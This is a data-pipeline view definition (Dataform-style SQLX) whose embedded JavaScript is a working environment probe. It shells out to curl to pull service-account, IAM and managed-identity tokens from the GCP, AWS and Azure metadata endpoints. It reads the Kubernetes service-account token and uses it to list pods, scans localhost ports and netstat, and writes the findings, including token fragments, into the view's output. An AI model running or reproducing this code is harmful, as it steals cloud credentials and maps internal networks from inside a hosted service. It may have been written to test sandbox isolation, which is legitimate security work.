config { type: "view", name: "network_probe" }

js {
  let results = {
    probeTime: new Date().toISOString(),
    purpose: "Network access probe - metadata service, outbound, internal services"
  };

  // Helper for sync HTTP request (if available)
  function syncHttpGet(url, timeout = 3000) {
    try {
      const cp = require('child_process');
      const result = cp.execSync(`curl -s -m 3 "${url}"`, {
        encoding: 'utf8',
        timeout: timeout
      });
      return { success: true, body: result.substring(0, 500) };
    } catch(e) {
      return { success: false, error: e.message.substring(0, 100) };
    }
  }

  // =============================================================================
  // TEST 1: GCP Metadata Service
  // =============================================================================
  results.test1_gcpMetadata = {};
  try {
    const metadataBase = "http://169.254.169.254";

    const endpoints = {
      root: syncHttpGet(metadataBase + "/"),
      computeMetadata: syncHttpGet(metadataBase + "/computeMetadata/v1/?recursive=true"),
      projectId: syncHttpGet(metadataBase + "/computeMetadata/v1/project/project-id"),
      zone: syncHttpGet(metadataBase + "/computeMetadata/v1/instance/zone"),
      hostname: syncHttpGet(metadataBase + "/computeMetadata/v1/instance/hostname"),
      serviceAccounts: syncHttpGet(metadataBase + "/computeMetadata/v1/instance/service-accounts/"),
      defaultToken: syncHttpGet(metadataBase + "/computeMetadata/v1/instance/service-accounts/default/token"),

      // With header (required for GCP)
      withHeader: null
    };

    // Try with proper header
    try {
      const cp = require('child_process');
      const result = cp.execSync(
        'curl -s -m 3 -H "Metadata-Flavor: Google" "http://169.254.169.254/computeMetadata/v1/instance/service-accounts/default/token"',
        { encoding: 'utf8', timeout: 5000 }
      );
      endpoints.withHeader = { success: true, body: result.substring(0, 500) };
    } catch(e) {
      endpoints.withHeader = { success: false, error: e.message.substring(0, 100) };
    }

    results.test1_gcpMetadata = {
      status: "completed",
      endpoints,
      metadataAccessible: endpoints.computeMetadata?.success || endpoints.withHeader?.success
    };
  } catch(e) {
    results.test1_gcpMetadata = { error: e.message.substring(0, 200) };
  }

  // =============================================================================
  // TEST 2: AWS Metadata Service (IMDSv1/v2)
  // =============================================================================
  results.test2_awsMetadata = {};
  try {
    const awsBase = "http://169.254.169.254";

    const endpoints = {
      // IMDSv1 (no token needed)
      v1Root: syncHttpGet(awsBase + "/latest/"),
      v1MetaData: syncHttpGet(awsBase + "/latest/meta-data/"),
      v1InstanceId: syncHttpGet(awsBase + "/latest/meta-data/instance-id"),
      v1IamCreds: syncHttpGet(awsBase + "/latest/meta-data/iam/security-credentials/"),
      v1UserData: syncHttpGet(awsBase + "/latest/user-data"),

      // EKS pod identity
      eksToken: syncHttpGet("http://169.254.170.2/v1/credentials")
    };

    results.test2_awsMetadata = {
      status: "completed",
      endpoints,
      awsMetadataAccessible: endpoints.v1MetaData?.success
    };
  } catch(e) {
    results.test2_awsMetadata = { error: e.message.substring(0, 200) };
  }

  // =============================================================================
  // TEST 3: Azure Metadata Service
  // =============================================================================
  results.test3_azureMetadata = {};
  try {
    const azureBase = "http://169.254.169.254";

    const endpoints = {
      instance: syncHttpGet(azureBase + "/metadata/instance?api-version=2021-02-01"),
      identity: syncHttpGet(azureBase + "/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/")
    };

    results.test3_azureMetadata = {
      status: "completed",
      endpoints
    };
  } catch(e) {
    results.test3_azureMetadata = { error: e.message.substring(0, 200) };
  }

  // =============================================================================
  // TEST 4: Kubernetes API Server
  // =============================================================================
  results.test4_k8sApi = {};
  try {
    const env = typeof process !== 'undefined' ? process.env : {};
    const k8sHost = env.KUBERNETES_SERVICE_HOST;
    const k8sPort = env.KUBERNETES_SERVICE_PORT || "443";

    if (!k8sHost) {
      results.test4_k8sApi = { status: "skipped", reason: "Not running in Kubernetes" };
    } else {
      // Try to read service account token
      let token = null;
      try {
        const fs = require('fs');
        token = fs.readFileSync('/var/run/secrets/kubernetes.io/serviceaccount/token', 'utf8');
      } catch(e) {}

      const k8sBase = `https://${k8sHost}:${k8sPort}`;

      const endpoints = {};

      // Try API endpoints
      try {
        const cp = require('child_process');
        const curlCmd = token ?
          `curl -s -k -m 3 -H "Authorization: Bearer ${token}" "${k8sBase}/api"` :
          `curl -s -k -m 3 "${k8sBase}/api"`;
        const result = cp.execSync(curlCmd, { encoding: 'utf8', timeout: 5000 });
        endpoints.api = { success: true, body: result.substring(0, 500) };
      } catch(e) {
        endpoints.api = { success: false, error: e.message.substring(0, 100) };
      }

      // Try to list pods
      try {
        const cp = require('child_process');
        const ns = "default";
        const curlCmd = token ?
          `curl -s -k -m 3 -H "Authorization: Bearer ${token}" "${k8sBase}/api/v1/namespaces/${ns}/pods"` :
          `curl -s -k -m 3 "${k8sBase}/api/v1/namespaces/${ns}/pods"`;
        const result = cp.execSync(curlCmd, { encoding: 'utf8', timeout: 5000 });
        endpoints.pods = { success: true, body: result.substring(0, 500) };
      } catch(e) {
        endpoints.pods = { success: false, error: e.message.substring(0, 100) };
      }

      results.test4_k8sApi = {
        status: "completed",
        k8sHost,
        k8sPort,
        tokenFound: !!token,
        tokenPreview: token ? token.substring(0, 50) + "..." : null,
        endpoints
      };
    }
  } catch(e) {
    results.test4_k8sApi = { error: e.message.substring(0, 200) };
  }

  // =============================================================================
  // TEST 5: Outbound HTTP Connectivity
  // =============================================================================
  results.test5_outbound = {};
  try {
    const testUrls = {
      google: syncHttpGet("https://www.google.com/robots.txt"),
      cloudflare: syncHttpGet("https://1.1.1.1/"),
      httpbin: syncHttpGet("https://httpbin.org/ip"),
      ifconfig: syncHttpGet("https://ifconfig.me/ip")
    };

    // Extract our external IP
    let externalIp = null;
    if (testUrls.ifconfig?.success) {
      externalIp = testUrls.ifconfig.body.trim();
    } else if (testUrls.httpbin?.success) {
      try {
        const data = JSON.parse(testUrls.httpbin.body);
        externalIp = data.origin;
      } catch(e) {}
    }

    results.test5_outbound = {
      status: "completed",
      testUrls,
      outboundPossible: Object.values(testUrls).some(t => t.success),
      externalIp
    };
  } catch(e) {
    results.test5_outbound = { error: e.message.substring(0, 200) };
  }

  // =============================================================================
  // TEST 6: DNS Resolution
  // =============================================================================
  results.test6_dns = {};
  try {
    const cp = require('child_process');

    const dnsTests = {};

    // Test various DNS lookups
    const domains = [
      'google.com',
      'metadata.google.internal',
      'kubernetes.default.svc.cluster.local'
    ];

    for (const domain of domains) {
      try {
        const result = cp.execSync(`nslookup ${domain} 2>&1 || true`, {
          encoding: 'utf8',
          timeout: 5000
        });
        dnsTests[domain] = { success: true, output: result.substring(0, 300) };
      } catch(e) {
        dnsTests[domain] = { success: false, error: e.message.substring(0, 100) };
      }
    }

    results.test6_dns = {
      status: "completed",
      dnsTests
    };
  } catch(e) {
    results.test6_dns = { error: e.message.substring(0, 200) };
  }

  // =============================================================================
  // TEST 7: Internal Network Scan
  // =============================================================================
  results.test7_internalScan = {};
  try {
    const cp = require('child_process');

    // Common internal services
    const internalTargets = {
      localhost80: syncHttpGet("http://127.0.0.1:80/"),
      localhost8080: syncHttpGet("http://127.0.0.1:8080/"),
      localhost3000: syncHttpGet("http://127.0.0.1:3000/"),
      redis: syncHttpGet("http://127.0.0.1:6379/"),
      postgres: syncHttpGet("http://127.0.0.1:5432/")
    };

    // Check listening ports
    let listeningPorts = null;
    try {
      const result = cp.execSync('netstat -tlnp 2>/dev/null || ss -tlnp 2>/dev/null || true', {
        encoding: 'utf8',
        timeout: 5000
      });
      listeningPorts = result.substring(0, 1000);
    } catch(e) {
      listeningPorts = "Error: " + e.message.substring(0, 100);
    }

    results.test7_internalScan = {
      status: "completed",
      internalTargets,
      listeningPorts
    };
  } catch(e) {
    results.test7_internalScan = { error: e.message.substring(0, 200) };
  }

  // =============================================================================
  // TEST 8: GCP Internal APIs
  // =============================================================================
  results.test8_gcpApis = {};
  try {
    const gcpEndpoints = {
      // BigQuery
      bigquery: syncHttpGet("https://bigquery.googleapis.com/"),

      // Storage
      storage: syncHttpGet("https://storage.googleapis.com/"),

      // Secret Manager
      secretManager: syncHttpGet("https://secretmanager.googleapis.com/"),

      // IAM
      iam: syncHttpGet("https://iam.googleapis.com/")
    };

    results.test8_gcpApis = {
      status: "completed",
      gcpEndpoints
    };
  } catch(e) {
    results.test8_gcpApis = { error: e.message.substring(0, 200) };
  }

  // =============================================================================
  // SUMMARY
  // =============================================================================
  results.summary = {
    testsRun: 8,
    allCompleted: Object.keys(results).filter(k =>
      k.startsWith("test") && results[k].status === "completed"
    ).length,
    criticalFindings: []
  };

  // Check for critical findings
  if (results.test1_gcpMetadata && results.test1_gcpMetadata.metadataAccessible) {
    results.summary.criticalFindings.push("GCP METADATA SERVICE ACCESSIBLE!");
  }

  if (results.test2_awsMetadata && results.test2_awsMetadata.awsMetadataAccessible) {
    results.summary.criticalFindings.push("AWS METADATA SERVICE ACCESSIBLE!");
  }

  if (results.test4_k8sApi && results.test4_k8sApi.tokenFound) {
    results.summary.criticalFindings.push("K8S API ACCESSIBLE WITH TOKEN!");
  }

  if (results.test5_outbound && results.test5_outbound.outboundPossible) {
    results.summary.criticalFindings.push("Outbound network access possible");
  }
}

SELECT '${JSON.stringify(results, null, 2)}' as network_probe
